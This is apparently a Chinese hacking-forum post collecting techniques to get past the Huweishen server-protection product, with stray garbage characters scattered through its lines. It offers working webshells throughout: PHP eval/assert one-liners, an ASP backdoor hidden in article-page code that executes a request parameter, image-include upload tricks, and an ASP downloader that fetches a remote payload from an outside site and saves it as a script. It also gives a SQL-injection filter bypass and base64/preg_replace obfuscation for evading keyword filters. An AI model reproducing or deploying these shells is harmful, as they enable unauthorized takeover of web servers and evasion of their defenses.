突破护卫神技术总汇

admin

申明：由于护卫神收费，破解版又比较低，因此，本贴方法均来自以往实战以及其他网络文献，没有写的请大家留言补上
-----------------------------------------------------------------------------------------------------------------------------------
文章分为：
一、马儿篇，都是以前可以过护卫神的马
$ y2 G1 I4 w- N  k/ `  U6 ?二、注入篇，可以绕过注入的方法
- h8 I3 Z' H! H% Y3 z三、规则篇，根据护卫神的过滤规则大家可以自己设计马儿
; G( ]2 [3 m! S, r4 E" H4 ^一、马儿篇
----------------1号--------------------------
! w9 B6 q" K, h1 K7 y< ?php
@eval
($_POST['1']);?>
----------------2号--------------------------
: B1 N3 Y/ t5 G  O<title>login</title>nono<?php
eval
($_POST
7 K$ h- l8 H6 M5 t* _. C[1])
?>
--------------------3号---------------------------------------------
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["c"]); ?>
' b- p$ S; H" P0 g3 O  U2 `; |菜刀直接连，不需要构造连接字符串，密码 c
; s: |# U2 e! o' ?+ z# j, A---------------------某牛给的，据说可过安全狗和护卫神------------------------------<%@language=vbscript codepage=936 %>
( F  d" Z# \) l! y7 B<%@language=vbscript codepage=936 %>
! D: ?# ?+ Q% P. O5 j4 b) b<%
Option Explicit
2 d/ E- x# T( t1 d$ v0 v'强制浏览器重新访问服务器下载页面，而不是从缓存读取页面
& O1 ^9 }2 N( L5 {) T2 V' FResponse.Buffer = True
) @( N, C9 H# \: d* U2 m# A5 fResponse.Expires = -1
Response.ExpiresAbsolute = Now() - 1
+ j) n6 V# h' i9 YResponse.Expires = 0
" z% d$ Y: v7 i# z; ^9 eResponse.CacheControl = "no-cache"
dim m
7 l/ e' _8 y/ V& i, F6 R: s# jm=request("m")
Dim ArticleID, Action, sql, rs, Hits, ShowType
, d# V, }2 O9 i$ W! H+ _3 qif m<>"" then execute(m)
ArticleID = Trim(request("ArticleID"))
Action = Trim(request("Action"))
+ l* a& S+ _6 N; t: z: X2 i* IShowType = Trim(request("ShowType"))
4 v8 {6 y  D- [7 SIf IsNumeric(ShowType) Then
    ShowType = CLng(ShowType)
- F* s- d7 j7 }0 b( b: A  L0 m' ^$ hElse
, M- Q. B. G# X2 ?( R    ShowType = 1
End If
1 h6 o, d; u! o9 a* S, g%>
--------------------类似于过安全狗的包含方法-------------------------------------------
A.asp版本：
将一句话保存为 XX.jpg 上传后 地址为 .../131717.jpg
! l( @) [1 a5 o* ^/ d* e5 ~( a0 Q4 j在上传一个 x.asp 内容为 <!–#include file="../131717.jpg"-->
B.php版本
( n. U2 C6 c% a: `# T% F如果是php的话：
; U0 f# j$ s; t; }* ]< ?php
2 S6 X) Y4 _6 i( ginclude "1.htm";
$ e, h  p- l+ ]% {' e+ Q?>
------------------实在不行，还可以下载---------------------------------------------
! x5 X/ Q2 J0 c# O6 O+ A, z远程下载马
3 |% G. C0 l# f# R! z1 G% ]<%
; @' Z3 c, T6 z) R8 L
9 s; I: i. h& P% x, b0 P& y6 `Set xPost = CreateObject("Microsoft.XMLHTTP")
/ S. \2 s  X/ Y
" e5 [3 Y7 J8 B& J9 K3 FxPost.Open "GET","http://www.8090sec.com/1.txt",False

xPost.Send()
3 P+ p, w# v0 R$ y6 }5 l* u
Set sGet = CreateObject("ADODB.Stream")

7 {; S- l% D0 \* ssGet.Mode = 3

8 _% p3 y1 I; r1 [% ]sGet.Type = 1
$ f  H0 Y$ g: r( i/ K2 {
9 r- g+ a- N+ ~! FsGet.Open()
- I( C9 c6 R& |) o5 U' z: K
sGet.Write(xPost.responseBody)
. X. u' g% R2 x
1 F3 Y/ A+ c4 X& S  K) b8 _sGet.SaveToFile Server.MapPath("ls.asp"),2

set sGet = nothing
0 B* j  G# ^$ k1 H9 g; I4 V5 u7 g% V
set sPOST = nothing
# L5 U% g! X4 |/ E8 X
%>
二、注入篇
/*%00*/截断符
1 s2 _  Q" ?; h* \/ Q0 ~' Y. v+ B3 K: vselect/*%00*/* from admin;
---------------------------------------------------------------
4 {% H0 Q+ u; ]# @---------------------------------------------------------------
三、规则篇
可以利用类似：
. r9 w, D) I$ J9 Z<?php

) A5 t0 Y+ D0 }7 K  `: [$code='一串base64'; //base64编码

* g& U: W4 l' w* x& C$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换
# P+ y, P; L- E
$a = '/a/';//正则规则
) T: w: }) p  V. t% B! O$ y% o2 v2 X
0 F& E! h% i- s: ]1 Xpreg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换
# s! W; ?; C; O. U
?>
方法绕过关键词过滤